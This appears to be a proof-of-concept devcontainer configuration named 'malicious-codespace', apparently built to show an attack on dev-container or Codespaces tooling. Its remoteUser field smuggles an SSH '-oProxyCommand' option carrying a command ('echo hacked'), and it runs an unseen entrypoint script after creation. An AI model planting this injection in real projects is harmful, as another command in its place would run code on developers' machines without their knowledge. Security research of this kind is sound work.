{
  "name": "malicious-codespace",
  "build": {
    "dockerfile": "Dockerfile"
  },
  "runArgs": [
    "--init"
  ],
  "postCreateCommand": "chmod +x /entrypoint.sh && /entrypoint.sh",
  "remoteUser": "-oProxyCommand=\"echo hacked\" #"
}

